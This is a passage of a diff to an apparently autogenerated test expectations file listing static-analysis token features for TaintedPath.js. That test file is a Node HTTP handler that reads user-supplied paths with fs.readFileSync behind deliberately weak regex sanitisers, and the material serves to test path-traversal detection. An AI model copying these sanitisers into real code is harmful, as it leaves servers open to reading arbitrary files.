+| autogenerated/TaintedPath/TaintedPath.js:185:30:185:58 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:58 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:185:30:185:58 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:185:30:185:58 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:185:30:185:58 | path.re ... /g, '') | calleeImports | fs | @@ -6451,6 +65149,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:185:30:185:58 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:185:30:185:58 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:185:30:185:58 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:185:35:185:41 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:35:185:41 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:35:185:41 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:185:35:185:41 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:35:185:41 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:185:43:185:53 | /\\.\\.\|BLA/g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:185:43:185:53 | /\\.\\.\|BLA/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:185:43:185:53 | /\\.\\.\|BLA/g | calleeImports | url | @@ -6469,6 +65172,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:185:56:185:57 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:185:56:185:57 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:185:56:185:57 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:97 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:97 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:97 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:97 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:97 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:97 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:97 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:97 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:97 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:3:189:97 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:7:189:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:7:189:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:7:189:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:7:189:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:7:189:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:96 | exceptional return of fs.read ... /, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:96 | exceptional return of fs.read ... /, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:96 | exceptional return of fs.read ... /, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:96 | exceptional return of fs.read ... /, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:13:189:96 | exceptional return of fs.read ... /, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:189:13:189:96 | fs.read ... /, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:189:13:189:96 | fs.read ... /, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:189:13:189:96 | fs.read ... /, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6477,6 +65220,17 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:189:13:189:96 | fs.read ... /, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:189:13:189:96 | fs.read ... /, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:189:13:189:96 | fs.read ... /, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:189:16:189:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:16:189:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:16:189:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:16:189:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:16:189:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:29:189:36 | "prefix" | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:29:189:36 | "prefix" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:29:189:36 | "prefix" | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:29:189:36 | "prefix" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:29:189:36 | "prefix" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:29:189:36 | "prefix" | stringConcatenatedWith | -endpoint- pathModule.normalize().replace() | | autogenerated/TaintedPath/TaintedPath.js:189:29:189:95 | "prefix ... +/, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:189:29:189:95 | "prefix ... +/, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:189:29:189:95 | "prefix ... +/, '') | calleeImports | fs | @@ -6486,6 +65240,47 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:189:29:189:95 | "prefix ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:189:29:189:95 | "prefix ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:189:29:189:95 | "prefix ... +/, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:49 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:49 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:49 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:49 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:49 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:59 | pathModule.normalize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:59 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:59 | pathModule.normalize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:59 | pathModule.normalize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:59 | pathModule.normalize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:65 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:65 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:65 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:65 | exceptional return of pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:65 | exceptional return of pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:65 | pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:65 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:65 | pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:65 | 